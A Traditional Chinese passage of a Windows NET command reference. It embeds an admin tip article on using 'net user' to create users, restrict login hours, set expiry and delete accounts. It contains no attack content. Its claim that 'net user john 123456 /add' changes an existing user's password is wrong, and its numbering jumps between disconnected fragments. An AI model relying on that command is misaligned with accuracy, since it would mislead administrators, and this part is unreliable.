作 用:不通過綁定來載入協議或網卡驅動(不能在DOS-WIN中用)
命令格式:NET INITIALIZE 〔/DYNAMIC〕
(3)NET LOGOFF
作 用:斷開連接的共享資源(不能在DOS-WIN中用)
(4)NET LOGON
作 用:在WORKGROUP中登陸(不能在DOS-WIN中用)
命令格式:NET LOGON 〔user 〔password | ?〕〕 〔/DOMAIN:name〕 〔/YES〕 〔/SAVEPW:NO〕
(5)NET PASSWORD
作 用:更改你的網路登陸口令(不能在DOS-WIN中用)
命令格式:NET PASSWORD computer | /DOMAIN:name 〔user 〔oldpassword 〔newpassword〕〕〕
網管:NET命令的另類用法
在一次幫助用戶維護網路的時候,偶然發現Windows XP操作系統中的NET系列命令中多了一個Net User命令。經過仔細推敲和演練發現Net User不僅可以用來添加或修改用戶或者顯示用戶信息,還可以對用戶設置不同的限制,比控制面板中的「用戶賬戶」的應用效果要好多了,大家不妨試試。
Net User命令是一個DOS命令,必須在Windows XP下的MS-DOS模式下運行,所以首先要進入MS-DOS模式:選擇「開始」菜單的「附件」選項的子選項「命令提示符」,或在「開始」菜單的「運行」選項(快捷鍵為Win+R)中輸入「cmd.exe」,進入MS-DOS模式。以下功能都基於此模式下。
建立一個普通新用戶
在MS-DOS提示符中輸入如下命令:「net user john 123 /add」,回車。即可新建一個名為「John」,密碼為「123」的新用戶。Add參數表示新建用戶。
值得注意的是:用戶名最多可有 20 個字元,密碼最多可有 127 個字元。
建立一個登錄時間受限制的用戶
用以下方法可實現對電腦使用時間的控制。比如,需要建立一個John的用戶賬號,密碼為「123」,登錄許可權從星期一到星期五的早上八點到晚上十點和雙休日的晚上七點到晚上九點。
1. 12小時制可鍵入如下命令:「net user john 123 /add /times:monday-friday,8AM-10PM;saturday-sunday,7PM-9PM」,回車確定即可
2. 24小時制可鍵入如下命令:「net user john 123 /add /times:M-F,8:00-22:00;Sa-Su,19:00-21:00」,回車確定即可。
值得注意的是:Time的增加值限制為1小時。對於Day值,可以用全稱或縮寫(即 M、T、W、Th、F、Sa、Su)。可以使用12小時或24小時時間表示法。對於12小時表示法,請使用AM、PM或A.M.、P.M.。All值表示用戶始終可以登錄;空值(空白)意味著用戶永遠不能登錄。用逗號分隔日期和時間,用分號分隔日期和時間單元(例如,M,4AM-5PM;T,1PM-3PM)。指定時間時不要使用空格。
另外,Passwordchg:{yes | no}參數可用來指定用戶是否可以更改自己的密碼,默認設置為 Yes。
限定用戶的使用時間
Net User命令還可以使用參數Expires:{{mm/dd/yyyy | dd/mm/yyyy | mmm,dd ,yyyy} | never} 使用戶賬號根據指定的Date過期限定用戶。過期日期可以是 [mm/dd/yyyy]、[dd/mm/yyyy] 或[mmm,dd,yyyy]格式。它取決於國家(地區)代碼。用戶賬號在指定日期開始時到期。對於月份值,可以使用數字、全稱或三個字母的縮寫(即Jan、Feb、Mar、Apr、May、Jun、Jul、Aug、Sep、Oct、Nov、Dec)。對於年份值,可以使用兩位數或四位數;使用逗號和斜杠分隔日期的各部分;不要使用空格。
例如:要限定用戶賬號John到2004年11月5日到期,可鍵入如下命令:「net user john /expires:Nov/5/2004」,回車確定即可。
查看用戶信息、修改已有用戶密碼和刪除用戶
如果在沒有參數的情況下使用,則Net User將顯示計算機上用戶的列表,如鍵入以下命令:「net user」,回車即可顯示該系統的所有用戶。
如果鍵入:「net user john」,回車則可顯示用戶John的信息。
若鍵入命令:「net user john 123456 /add」,回車確定,則強制將用戶John(John為已有用戶)的密碼更改為123456。
若鍵入命令:「net user john /delete」,回車確定則可刪除用戶John。
關於Net User命令的用法就介紹這么多,其實像這樣的技巧很多,需要大家不斷探索,相互交流。
(2)/domain〔:name〕指定要與其時間同步的域。
(3)/set使本計算機時鍾與指定計算機或域的時鍾同步。
下面的這4個參數是相關的,所以一起介紹
(5)Net Start
作 用:啟動服務,或顯示已啟動服務的列表。